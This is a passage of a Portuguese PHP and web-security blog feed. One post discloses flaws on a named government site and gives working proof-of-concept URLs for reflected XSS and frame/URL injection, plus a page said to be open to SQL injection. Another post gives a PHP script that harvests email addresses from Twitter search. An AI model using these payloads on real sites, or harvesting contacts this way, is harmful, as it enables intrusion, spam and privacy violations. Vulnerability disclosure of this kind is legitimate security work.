<p style="text-align: justify;">Depois claro que aparecem sempre problemas com bases de dados com informações confidenciais roubadas, session hijacking, ou os famosos defaces.</p>
<p style="text-align: justify;">Vamos lá pessoal, não é nada de impossível, é só preciso querer. Com o mínimo de cuidado podem ser evitadas muitas situações embaraçosas para vocês, para os vossos clientes e para o público alvo dos vossos clientes.</p>
<p style="text-align: justify;"><span style="color: #c0c0c0;">Imagem de http://www.fireblog.com/</span></p>
<div class="shr-publisher-906"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F25%2Fweb-security-youre-doing-it-wrong%2F' data-shr_title='Web+Security+-+You%27re+Doing+it+WRONG'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F25%2Fweb-security-youre-doing-it-wrong%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F08%2F25%2Fweb-security-youre-doing-it-wrong%2F' data-shr_title='Web+Security+-+You%27re+Doing+it+WRONG'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2010/08/25/web-security-youre-doing-it-wrong/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>PHP Security Check-List CheatSheet</title>
		<link>http://joaopedropereira.com/blog/2010/04/18/php-security-check-list-cheatsheet/</link>
		<comments>http://joaopedropereira.com/blog/2010/04/18/php-security-check-list-cheatsheet/#comments</comments>
		<pubDate>Sun, 18 Apr 2010 13:41:56 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[Webdevelopment]]></category>
		<category><![CDATA[cheatsheet]]></category>
		<category><![CDATA[php]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=743</guid>
		<description><![CDATA[Para cada projecto que tenho desenvolvido ultimamente utilizando a linguagem de programação server-side PHP, tenho-me guiado por uma checklist de forma a não me esquecer  de nada evitando assim falhas graves nas aplicações que desenvolvo. Pois a segurança é uma das preocupações que tenho. Esta checklist aborda diversas situações como, casos gerais, casos de input, [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F04%2F18%2Fphp-security-check-list-cheatsheet%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F04%2F18%2Fphp-security-check-list-cheatsheet%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Para cada projecto que tenho desenvolvido ultimamente utilizando a linguagem de programação server-side PHP, tenho-me guiado por uma checklist de forma a não me esquecer  de nada evitando assim falhas graves nas aplicações que desenvolvo. Pois a segurança é uma das preocupações que tenho.</p>
<p>Esta checklist aborda diversas situações como, casos gerais, casos de input, file uploads, autenticação, entre outros.</p>
<div id="attachment_744" class="wp-caption aligncenter" style="width: 234px"><a href="http://joaopedropereira.com/files/phpsec_cheatsheet.pdf"><img class="size-medium wp-image-744" title="PHP Security CheckList" src="http://joaopedropereira.com/blog/wp-content/uploads/2010/04/phpsec_cheatsheet-224x300.png" alt="" width="224" height="300" /></a><p class="wp-caption-text">Click on image to download</p></div>
<p>Recomendo vivamente a sua utilização e até sugestões de melhorias, apesar de ela não ser da minha autoria.</p>
<p>O que acham desta checklist? Conhecem alguma melhor? Como se guiam no desenvolvimento de aplicações web de forma  a manter a segurança da mesma?</p>
<div class="shr-publisher-743"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F04%2F18%2Fphp-security-check-list-cheatsheet%2F' data-shr_title='PHP+Security+Check-List+CheatSheet'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F04%2F18%2Fphp-security-check-list-cheatsheet%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F04%2F18%2Fphp-security-check-list-cheatsheet%2F' data-shr_title='PHP+Security+Check-List+CheatSheet'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2010/04/18/php-security-check-list-cheatsheet/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Vulnerabilidades Site Novas Oportunidades</title>
		<link>http://joaopedropereira.com/blog/2010/03/08/vulnerabilidades-site-novas-oportunidades/</link>
		<comments>http://joaopedropereira.com/blog/2010/03/08/vulnerabilidades-site-novas-oportunidades/#comments</comments>
		<pubDate>Mon, 08 Mar 2010 14:43:23 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[Segurança]]></category>
		<category><![CDATA[Webdevelopment]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[vulnerabilidade]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=722</guid>
		<description><![CDATA[Já há algum tempo que tenho andado a investigar sites nacionais em busca de falhas de segurança e quase todos as têm, as mais frequentes são as falhas XSS mas também é muito comum encontrar falhas de SQL Injection. Hoje tive acesso através de um tweet do Público (http://bit.ly/aU0kuy) à informação de que o site [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F03%2F08%2Fvulnerabilidades-site-novas-oportunidades%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F03%2F08%2Fvulnerabilidades-site-novas-oportunidades%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Já há algum tempo que tenho andado a investigar sites nacionais em busca de falhas de segurança e quase todos as têm, as mais frequentes são as falhas XSS mas também é muito comum encontrar falhas de SQL Injection.</p>
<p style="text-align: center;"><a href="http://joaopedropereira.com/blog/wp-content/uploads/2010/03/logo.png"><img class="size-full wp-image-728 aligncenter" title="Novas Oportunidades" src="http://joaopedropereira.com/blog/wp-content/uploads/2010/03/logo.png" alt="" width="301" height="157" /></a></p>
<p>Hoje tive acesso através de um tweet do Público (<a title="Site das Novas Oportunidades atacado por hacker" href="http://bit.ly/aU0kuy" target="_blank">http://bit.ly/aU0kuy</a>) à informação de que o site das <a title="Novas Oportunidades" href="http://www.novasoportunidades.gov.pt/" target="_blank">Novas Oportunidades</a> tinha sido explorado e alterado por  alguém&#8230; Decidi então enquanto era tempo verificar as falhas que existiam no site e qual o meu espanto (not) quando vejo presentes falhas de XSS, falhas de SQL Injection e falhas de validação de parâmetros que permitem Impersonation Attack através de injecção de URL.</p>
<p>O ataque relatado pelo público foi feito através de SQL Injection possivelmente na página seguinte pois esta está totalmente aberta a ataques deste género: <a href="http://testemunhos.novasoportunidades.gov.pt/detalhe_video.aspx?id=9&amp;tipo=1" target="_blank" class="broken_link">http://testemunhos.novasoportunidades.gov.pt/detalhe_video.aspx</a></p>
<p><a href="http://joaopedropereira.com/blog/wp-content/uploads/2010/03/Screenshot-3.png"><img class="aligncenter size-thumbnail wp-image-736" title="Novas Oportunidades SQL Injection" src="http://joaopedropereira.com/blog/wp-content/uploads/2010/03/Screenshot-3-150x150.png" alt="" width="150" height="150" /></a></p>
<p>O ataque que referi relativo a problemas de validação de parâmetros que permitem injecção de URL: <a href="http://www.novasoportunidades.gov.pt/outerFrame.jsp?link=http://joaopedropereira.com/blog/ " target="_blank">http://www.novasoportunidades.gov.pt/outerFrame.jsp?link=http://joaopedropereira.com/blog/</a></p>
<p><a href="http://joaopedropereira.com/blog/wp-content/uploads/2010/03/Screenshot-2.png"><img class="aligncenter size-thumbnail wp-image-735" title="Novas Oportunidades Impersonation Attack" src="http://joaopedropereira.com/blog/wp-content/uploads/2010/03/Screenshot-2-150x150.png" alt="" width="150" height="150" /></a></p>
<p>Com alguma imaginação pode-se fazer alguns ataques interessantes a partir daqui&#8230;</p>
<p>Na pesquisa também podemos facilmente fazer ataques de XSS (Cross Site Scripting) como referi anteriormente: <a href="http://www.novasoportunidades.gov.pt/np4/q?q=%3Cscript%3Ealert%28%22The+Blog+of+a+WebDeveloper%22%29%3C%2Fscript%3E" target="_blank">http://www.novasoportunidades.gov.pt/np4/q?q=%3Cscript%3Ealert%28%22The+Blog+of+a+WebDeveloper%22%29%3C%2Fscript%3E</a></p>
<p><a href="http://joaopedropereira.com/blog/wp-content/uploads/2010/03/Screenshot-1.png"><img class="aligncenter size-thumbnail wp-image-734" title="Novas Oportunidades XSS Attack" src="http://joaopedropereira.com/blog/wp-content/uploads/2010/03/Screenshot-1-150x150.png" alt="" width="150" height="150" /></a></p>
<p>Isto mostra a preparação e conhecimentos ao nível de segurança informática que os WebDevelopers que o estado contrata têm&#8230; Atenção este não é o único site governamental com problemas graves de segurança, existem mais e talvez que transaccionem dados mais importantes&#8230;</p>
<p><strong><span style="text-decoration: underline;">Nota</span></strong>: Este post não tem como intuito incentivar qualquer tipo de ataque informático, pretende apenas informar e alertar para os problemas informáticos que podem surgir num futuro nas infraestruturas governamentais (e não só). É importante ter as nossas plataformas o mais seguras possíveis, para não sermos surpreendidos um dia.</p>
<p><strong><span style="text-decoration: underline;">EDIT</span></strong></p>
<p>As falhas estão a ser corrigidas, quase completas por isso para registo futuro adicionei screenshots das falhas. É também de valor ler e participar nos comentários a este post que estão a dar uma boa análise do Web Development nacional.</p>
<p><strong>EDIT 2</strong></p>
<p>Governo desmente ataque informático: <a title="Portal Novas Oportunidades não foi alvo de ataque informático" href="http://www.governo.gov.pt/pt/GC18/Governo/Ministerios/MTSS/Notas/Pages/20100308_MTSS_Com_Novas_Oportunidades.aspx" target="_blank">Portal Novas Oportunidades não foi alvo de ataque informático </a>. Provavelmente precisam que venha algo abaixo e que cause danos a muitas pessoas para admitirem os erros&#8230;</p>
<div class="shr-publisher-722"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F03%2F08%2Fvulnerabilidades-site-novas-oportunidades%2F' data-shr_title='Vulnerabilidades+Site+Novas+Oportunidades'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F03%2F08%2Fvulnerabilidades-site-novas-oportunidades%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2010%2F03%2F08%2Fvulnerabilidades-site-novas-oportunidades%2F' data-shr_title='Vulnerabilidades+Site+Novas+Oportunidades'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2010/03/08/vulnerabilidades-site-novas-oportunidades/feed/</wfw:commentRss>
		<slash:comments>23</slash:comments>
		</item>
		<item>
		<title>PHP Twitter Bot :: Crawling Emails</title>
		<link>http://joaopedropereira.com/blog/2009/09/22/php-twitter-bot-crawling-emails/</link>
		<comments>http://joaopedropereira.com/blog/2009/09/22/php-twitter-bot-crawling-emails/#comments</comments>
		<pubDate>Tue, 22 Sep 2009 18:13:23 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[Projectos]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[bot]]></category>
		<category><![CDATA[crawling]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[twitter]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=493</guid>
		<description><![CDATA[Um dos projectos que estou a começar a desenvolver é um Twitter Bot que seja capaz de simular o comportamento de um utilizador durante um curto período de tempo, dependendo da configuração que o utilizador lhe quiser dar. Deve também ter todas as funcionalidades que possam ser úteis ou pensáveis para um programa deste género [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F09%2F22%2Fphp-twitter-bot-crawling-emails%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F09%2F22%2Fphp-twitter-bot-crawling-emails%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Um dos projectos que estou a começar a desenvolver é um Twitter Bot que seja capaz de simular o comportamento de um utilizador durante um curto período de tempo, dependendo da configuração que o utilizador lhe quiser dar. Deve também ter todas as funcionalidades que possam ser úteis ou pensáveis para um programa deste género e por isso muito é necessário pesquisar e estudar.</p>
<p>Hoje surgiu-me a ideia de utilizar a pesquisa do Twitter para encontrar e-mails. Claro que não fui o primeiro a pensar nisto, então em vez de reinventar a roda fui alterá-la apenas para andar melhor.</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #990000;">ob_start</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #000000; font-weight: bold;">function</span> writemail<span style="color: #009900;">&#40;</span><span style="color: #000088;">$matches</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
	<span style="color: #b1b100;">foreach</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$matches</span> <span style="color: #b1b100;">as</span> <span style="color: #000088;">$emails</span><span style="color: #009900;">&#41;</span>
		<span style="color: #b1b100;">foreach</span> <span style="color: #009900;">&#40;</span><span style="color: #000088;">$emails</span> <span style="color: #b1b100;">as</span> <span style="color: #000088;">$email</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
			<span style="color: #b1b100;">echo</span> <span style="color: #000088;">$email</span><span style="color: #339933;">.</span><span style="color: #0000ff;">'
'</span><span style="color: #339933;">;</span>
			<span style="color: #990000;">ob_flush</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
		<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #009900;">&#125;</span>
&nbsp;
<span style="color: #b1b100;">for</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$id</span><span style="color: #339933;">=</span><span style="color: #cc66cc;">1</span><span style="color: #339933;">;</span> <span style="color: #000088;">$id</span><span style="color: #339933;">&lt;</span> <span style="color: #339933;">=</span><span style="color: #cc66cc;">20</span><span style="color: #339933;">;</span> <span style="color: #000088;">$id</span><span style="color: #339933;">++</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span>
	<span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> proxify_my_connection<span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;http://search.twitter.com/search?page=&quot;</span><span style="color: #339933;">.</span><span style="color: #000088;">$id</span><span style="color: #339933;">.</span><span style="color: #0000ff;">&quot;&amp;q=gmail.com+OR+msn.com+OR+hotmail.com+OR+<span style="color: #009933; font-weight: bold;">%22e</span>mail+me%22&amp;rpp=100&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #000088;">$file</span> <span style="color: #339933;">=</span> <span style="color: #990000;">strip_tags</span><span style="color: #009900;">&#40;</span><span style="color: #000088;">$file</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
	<span style="color: #990000;">preg_match_all</span><span style="color: #009900;">&#40;</span>
		<span style="color: #0000ff;">&quot;([a-z0-9!#$%&amp;'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&amp;'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+(?:[A-Z]{2}|com|org|net|gov|mil|biz|info|mobi|name|aero|jobs|museum)\b)siU&quot;</span><span style="color: #339933;">,</span>
		<span style="color: #000088;">$file</span><span style="color: #339933;">,</span>
		<span style="color: #000088;">$matches</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
	writemail<span style="color: #009900;">&#40;</span><span style="color: #000088;">$matches</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
&nbsp;
<span style="color: #009900;">&#125;</span>
<span style="color: #990000;">ob_end_flush</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>O que este código faz, basicamente, é ler a página de pesquisa do Twitter e utilizando <a title="Regular Expression - Wikipedia" href="http://en.wikipedia.org/wiki/Regular_expression" target="_blank">Regular Expressions</a> encontrar os e-mails existentes na página, e depois continua pelas páginas seguintes.</p>
<p>/search?page=&#8221;.$id.&#8221;&amp;q=gmail.com+OR+msn.com+OR+hotmail.com+OR+%22email+me%22&amp;rpp=100</p>
<p><strong>page</strong> numero da página<br />
<strong>q</strong> representa a query, a chave a pesquisar<br />
<strong>rpp</strong> results per page sendo que o máximo permitido pelo twitter é 100</p>
<p>Como podem reparar no meu código existe uma função que não está presente nem faz parte do PHP, a proxify_my_connection, é uma ferramenta que eu próprio desenvolvi há algum tempo e que não a quero tornar pública. Mas é fácil de a substituir, mesmo utilizando funções que já vêm de raíz no PHP. Podem também ver <a title="Scraping websites with PHP cURL under proxy" href="http://www.fromzerotoseo.com/scraping-websites-php-curl-proxy/" target="_blank">aqui</a> uma função com efeito semelhante à que eu desenvolvi, no entanto não tem nada a ver uma com a outra.</p>
<p>Em vez da função writemail() é mais produtivo ter uma base de dados onde quardar os e-mails e verificar se estes são repetidos ou não&#8230;</p>
<p>Podem dar uso à vossa imaginação, aumentar e desenvolver a query, aumentar a performance do script, etc. isto foi só um pequeno exemplo do que se pode fazer com a search do twitter.</p>
<h3>Bibliografia</h3>
<p style="text-align: left;">Regex utilizado no meu código: <a title="Twitter email grabber" href="http://www.fromzerotoseo.com/twitter-email-grabber/" target="_blank">http://www.fromzerotoseo.com/twitter-email-grabber/</a></p>
<h2 style="text-align: center;">Contribua para este blog deixando</h2>
<h2 style="text-align: center;">a sua opinião e um pouco do seu conhecimento</h2>
</pre>
<div class="shr-publisher-493"></div><!-- Start Shareaholic LikeButtonSetBottom Automatic --><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><div class='shareaholic-like-buttonset' style='float:none;height:30px;'><a class='shareaholic-fblike' data-shr_layout='button_count' data-shr_showfaces='false' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F09%2F22%2Fphp-twitter-bot-crawling-emails%2F' data-shr_title='PHP+Twitter+Bot+%3A%3A+Crawling+Emails'></a><a class='shareaholic-fbsend' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F09%2F22%2Fphp-twitter-bot-crawling-emails%2F'></a><a class='shareaholic-googleplusone' data-shr_size='medium' data-shr_count='true' data-shr_href='http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F09%2F22%2Fphp-twitter-bot-crawling-emails%2F' data-shr_title='PHP+Twitter+Bot+%3A%3A+Crawling+Emails'></a></div><div style="clear: both; min-height: 1px; height: 3px; width: 100%;"></div><!-- End Shareaholic LikeButtonSetBottom Automatic -->]]></content:encoded>
			<wfw:commentRss>http://joaopedropereira.com/blog/2009/09/22/php-twitter-bot-crawling-emails/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>O WebDeveloper que Utiliza PHP :: Caminho</title>
		<link>http://joaopedropereira.com/blog/2009/08/15/php-developer-caminho/</link>
		<comments>http://joaopedropereira.com/blog/2009/08/15/php-developer-caminho/#comments</comments>
		<pubDate>Sat, 15 Aug 2009 15:38:50 +0000</pubDate>
		<dc:creator>João Pedro Pereira</dc:creator>
				<category><![CDATA[Optimização]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Segurança]]></category>
		<category><![CDATA[Webdevelopment]]></category>
		<category><![CDATA[cache]]></category>
		<category><![CDATA[code igniter]]></category>
		<category><![CDATA[frameworks]]></category>
		<category><![CDATA[kohana]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[php]]></category>
		<category><![CDATA[regex]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://joaopedropereira.com/blog/?p=456</guid>
		<description><![CDATA[PHP é a linguagem de programação web server-side mais utilizada a nível Mundial e neste artigo vão ser retratados os aspectos que devem fazer parte do estudo, do caminho de um WebDeveloper que quer desenvolver em PHP. Entre eles Boas práticas, Frameworks, Segurança, Caching, Buffering e Environments. O Melhor Amigo &#8211; PHP Manual Antes de [...]]]></description>
			<content:encoded><![CDATA[<!-- Start Shareaholic LikeButtonSetTop Automatic --><!-- End Shareaholic LikeButtonSetTop Automatic --><div class="tweetmeme_button" style="float: left; margin-right: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F08%2F15%2Fphp-developer-caminho%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fjoaopedropereira.com%2Fblog%2F2009%2F08%2F15%2Fphp-developer-caminho%2F&amp;source=joaoppereira&amp;style=normal&amp;service=bit.ly&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><a href="http://pt.php.net/" target="_blank"><img class="alignright" title="PHP" src="http://pt.php.net/images/php.gif" alt="" width="120" height="67" /></a>PHP é a linguagem de programação web server-side mais utilizada a nível Mundial e neste artigo vão ser retratados os aspectos que devem fazer parte do estudo, do caminho de um WebDeveloper que quer desenvolver em PHP. Entre eles Boas práticas, Frameworks, Segurança, Caching, Buffering e Environments.</p>
<h2>O Melhor Amigo &#8211; PHP Manual</h2>
<p>Antes de mais é necessário aprender a linguagem em si, e o PHP é uma linguagem com uma enorme comunidade por trás que desenvolveu o PHP Manual, neste manual encontra-se todo o conhecimento necessário para se dominar a linguagem PHP. E como se não chegasse a sua enorme qualidade este é, também, gratuito e pode ser acedido quer online quer offline.</p>
<p>De leitura fácil encontramos no PHP Manual a documentação de como proceder à sua instalação e configuração, a documentação da estrutura lógica da linguagem bem como de todas as funções que a compõe sem nunca faltarem imensos exemplos! A secção das notas dos utilizadores é riquissima em estudos e desenvolvimentos de cada função, não dispensem a sua leitura!</p>
<p><a title="PHP Manual" href="http://www.php.net/manual/pt_BR/index.php" target="_blank">Aceder ao PHP Manual em Português</a></p>
<h2>Montar um Ambiente de Teste</h2>
<p>Para testar o PHP não é necessário apenas ter um editor de texto e um browser, é necessário um servidor que corra o interpretador de PHP.</p>
<p>Então para começarmos a desenvolver em PHP é necessário configurar um pequeno servidor ou então utilizar um host existente&#8230;</p>
<p>Existem soluções que não envolvem muito trabalho nas configurações, como o <a title="MAMP" href="http://www.mamp.info/en/index.html" target="_blank">MAMP</a> (Mac), <a title="WAMP" href="http://www.wampserver.com/en/" target="_blank">WAMP</a> (Windows), <a title="LAMP" href="http://en.wikipedia.org/wiki/LAMP_(software_bundle)" target="_blank">LAMP</a> (Linux), estas ferramentas já trazem também incluido a SGBD (Sistema de Gestão de Base de Dados) <a title="MySQL :: The world's most popular open source database" href="http://www.mysql.com/" target="_blank">MySQL</a>.</p>
<p>Depois para desenvolver o código pode utilizar ferramentas de auxilio, os IDE&#8217;s. A SmashingMagazine realizou um estudo comparativo sobre IDE&#8217;s para PHP. <a title="The Big PHP IDE Test" href="http://www.smashingmagazine.com/2009/02/11/the-big-php-ides-test-why-use-oneand-which-to-choose/" target="_blank">Ver Estudo Comparativo de IDE&#8217;s para PHP Aqui</a></p>
<p>Para quem não quer editores tão pesados aconselho o <a title="Geany" href="http://www.geany.org/" target="_blank">Geany</a> (Linux) ou <a title="Notepad++" href="http://notepad-plus.sourceforge.net/br/site.htm" target="_blank">Notepad++</a> (Windows).</p>
<h2>Desenvolver Bom Código</h2>
<p>Isto não é algo restrito ao PHP mas a todas as linguagens de programação.</p>
<p>Quando programamos algo deve ter, além de uma estrutura lógica e funcional correcta, uma boa identação, documentação e deve também ser auto-explicativa (variáveis, classes e funções com nomes que descrevam facilmente o que contêm / o que fazem).</p>
<p>Deve ser fácil de ler e entender quer pelo próprio programador daqui a uns anos ou por outro programador que tenha de modificar algo no código desenvolvido.</p>
<h3>Manter Funções Fora de Ciclos</h3>
<p>Manter sempre a declaração de funções fora de ciclos é um aspecto muito importante quando visamos a performance de uma aplicação desenvolvida em PHP pois num ciclo que se repete (imaginemos) 500 vezes, a função será declarada 500 vezes, uma perda de tempo.</p>
<h3>Organização do Código por Ficheiros</h3>
<p>Além da organização ao nível das linhas código em si temos a organização de código relativa à separação por ficheiros e categorias. Para facilitar o entendimento e a detecção e correcção de erros o código deve ser separado lógicamente.</p>
<p>Imaginemos que estamos a desenvolver um CMS (Content Management System). E então devido à grande quantidade de código que tem de ser desenvolvido vamos separar o código em vários ficheiros.</p>
<p>Má Prática</p>
<p><img class="aligncenter size-full wp-image-462" title="Má Prática - Organização Ficheiros" src="http://joaopedropereira.com/blog/wp-content/uploads/2009/08/CapturaEcra.png" alt="Má Prática - Organização Ficheiros" width="633" height="97" /></p>
<p>Boa Prática</p>
<p style="text-align: center;"><img class="aligncenter size-full wp-image-463" title="Boa Prática - Organização Código" src="http://joaopedropereira.com/blog/wp-content/uploads/2009/08/CapturaEcra-1.png" alt="Boa Prática Organização Código" width="766" height="87" /></p>
<h2>Aprender Object Oriented Programming</h2>
<p>Object-oriented programming (OOP) ou Programação Orientada a Objectos (POO) em Português utiliza objectos para representar partes da aplicação permitindo separar em secções lógicas o código, facilitando a sua modificação e organização.</p>
<h2>Aprender a Utilizar uma Framework</h2>
<p>Muitos defendem que se deve aprender a utilizar frameworks na iniciação ao PHP porque com elas se aprende a desenvolver código mais avançado, a organizar melhor o código, a torná-lo lógico, a fazer debbug de erros, etc.</p>
<p>Outros defendem que não se deve aprender a utilizar frameworks na iniciação ao PHP porque no inicio o que os utilizadores necessitam é fazer os seus erros, aprender a desenvolver o seu código de raíz, sem funções e classes prontas a utilizar (exceptuando aquelas que vêm de raíz no PHP claro).</p>
<p>Eu considero que o utilizador deve dar uma olhadela a algumas frameworks e decidir se as deve ou não utilizar, porque cada pessoa é unica e pode aprender de diversas formas. Frameworks que considero muito bem estruturadas: <a title="Kohana: Swift, Secure, and Small PHP 5 Framework" href="http://www.kohanaphp.com/" target="_blank">Kohana</a>, <a title="CodeIgniter - Open source PHP web application framework" href="http://codeigniter.com/" target="_blank">CodeIgniter</a> e <a title="CakePHP: the rapid development php framework" href="http://cakephp.org/" target="_blank">CakePHP</a> .</p>
<h2>Nunca Confie nos Utilizadores</h2>
<p>Um dos aspectos mais importantes ao nível da segurança de aplicações informáticas é nunca confiar nos utilizadores da aplicação que estamos a desenvolver.</p>
<p>E que implica isso? Validar tudo o que entra! URL&#8217;s, formulários, cookies, sessões e até headers dos browsers.</p>
<p>Vamos então ver alguns exemplos de validações pois seria impossível cobrir todas as validações possíveis.</p>
<h2>Validar Dados</h2>
<p>É muito importante validar e corrigir todos os dados que possam ser introduzidos pelo utilizador! Infelizmente tenho visto imensas aplicações web sem qualquer protecção contra ataques tornando-as completamente vulneráveis a ataques.</p>
<p>Imaginemos o seguinte URL: joaopedropereira.com/xpto.php?id=1245</p>
<p>Que falha pode ser explorada aqui? O parâmetro dado ao id que pode ser utilizado para um SQL Injection por exemplo. Como fazer esta validação? Através de Regex:</p>

<div class="wp_syntax"><div class="code"><pre class="php" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">function</span> is_natural<span style="color: #009900;">&#40;</span><span style="color: #000088;">$str</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
